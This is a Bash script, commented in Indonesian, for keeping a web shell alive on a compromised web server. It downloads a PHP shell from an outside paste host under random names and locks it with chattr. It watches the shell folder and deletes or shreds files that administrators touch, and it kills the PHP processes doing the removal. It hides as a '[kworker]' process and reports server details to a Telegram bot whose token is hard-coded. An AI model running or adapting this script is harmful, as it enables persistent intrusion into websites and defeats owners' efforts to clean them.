#!/bin/bash

# Logging
LOG_FILE="/tmp/anti_gedor.log"
exec > "$LOG_FILE" 2>&1
set -x

# Konfigurasi
WEB_ROOT="/home/sekolahb/public_html/"
WEB_SHELL_DIR="$WEB_ROOT/shell"
BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719"
TELEGRAM_BOT_TOKEN="7942393115:AAEriWlHhR0Y32kCHBZuYWj0ZcUvoW36MB0"
TELEGRAM_CHAT_ID="1345261884"

# Fungsi kirim notifikasi ke Telegram dengan error handling
send_telegram() {
    local message="$1"
    echo "Mengirim pesan: $message"
    
    local response=$(timeout 10 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
        -d "chat_id=$TELEGRAM_CHAT_ID" \
        -d "text=$message" 2>&1)
    
    local curl_exit=$?
    if [ $curl_exit -ne 0 ]; then
        echo "ERROR: Curl gagal dengan kode $curl_exit"
        echo "Response: $response"
        return 1
    fi
    
    # Cek response dari Telegram
    if echo "$response" | grep -q '"ok":false'; then
        echo "ERROR: Telegram API error"
        echo "Response: $response"
        return 1
    fi
    
    echo "Pesan terkirim successfully"
    return 0
}

# Fungsi notifikasi startup
send_startup_notification() {
    local server_ip=$(hostname -I | awk '{print $1}')
    local server_name=$(hostname)
    local web_root_info=$(ls -ld "$WEB_ROOT" | awk '{print $3,$4}')
    
    send_telegram "🟢 ANTI GEDOR BOT AKTIF!
    
Server: $server_name ($server_ip)
Web Root: $WEB_ROOT
Shell Dir: $WEB_SHELL_DIR
Owner: $web_root_info
Status: Monitoring aktif

✅ Sistem siap menghadapi serangan!
Siapa berani hapus, langsung hilang duluan!🖕"
}

# Fungsi deploy ulang shell
deploy_shell() {
    echo "Deploying new shell..."
    local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf))
    local random_dir="${existing_dirs[0]}"
    
    if [ -z "$random_dir" ]; then
        echo "Tidak ada direktori yang cocok, menggunakan WEB_ROOT"
        random_dir="$WEB_ROOT"
    fi
    
    local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
    local new_shell_path="$random_dir/$shell_name"
    
    echo "Mendownload shell ke: $new_shell_path"
    curl -s -o "$new_shell_path" "$BACKUP_SHELL"
    
    if [ $? -ne 0 ]; then
        echo "ERROR: Gagal download shell"
        return 1
    fi
    
    chmod 400 "$new_shell_path"
    
    if [ "$(id -u)" -eq 0 ]; then
        chattr +i "$new_shell_path" 2>/dev/null
    fi
    
    send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
    echo "$new_shell_path"
}

# Fungsi hapus file berbahaya
delete_intruder() {
    local target="$1"
    echo "Menghapus file: $target"
    
    if [ ! -f "$target" ]; then
        echo "File tidak ditemukan: $target"
        return 1
    fi
    
    rm -f "$target"
    
    if [ -f "$target" ]; then
        shred -fuz "$target" 2>/dev/null
    fi
    
    echo "File berhasil dihapus"
}

# Fungsi deteksi PHP attacker
detect_and_delete_php_attacker() {
    echo "Mendeteksi PHP attacker..."
    local php_processes=$(pgrep -f "php" | head -10)
    local attacker_found=""
    
    for pid in $php_processes; do
        local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
        local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')
        
        if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
            attacker_found="$php_file"
            break
        fi
        
        if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
            attacker_found="$php_file"
            break
        fi
    done
    
    if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
        delete_intruder "$attacker_found"
        send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
        echo "$attacker_found"
    fi
}

# Main script
echo "Memulai script..."
echo "WEB_ROOT: $WEB_ROOT"
echo "WEB_SHELL_DIR: $WEB_SHELL_DIR"

# Buat direktori target
mkdir -p "$WEB_SHELL_DIR"
echo "Direktori target: $WEB_SHELL_DIR"

# Kirim notifikasi startup
send_startup_notification

# Main loop dengan penyamaran proses
exec -a "[kworker]" bash -c '
echo "Memulai monitoring..."

# Monitor direktori
inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null | while read file event
do
    echo "Terdeteksi: $file dengan event $event"
    [[ -d "$file" ]] && continue
    
    # Hapus file yang diotak-atik
    delete_intruder "$file"
    
    # Deteksi dan hapus balik PHP attacker
    attacker_file=$(detect_and_delete_php_attacker)
    
    # Deploy shell baru
    new_shell=$(deploy_shell)
    
    # Kirim notifikasi lengkap
    if [ -n "$attacker_file" ]; then
        send_telegram "🚨 PHP ATTACKER DETECTED & DELETED!
File: $file
Event: $event
Attacker: $attacker_file
New Shell: $new_shell
✅Mendeteksi file PHP yang dipakai untuk menghapus.
✅Menghapus balik file PHP tersebut secara otomatis.
✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya.
Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕"
    else
        send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell"
    fi
done
' &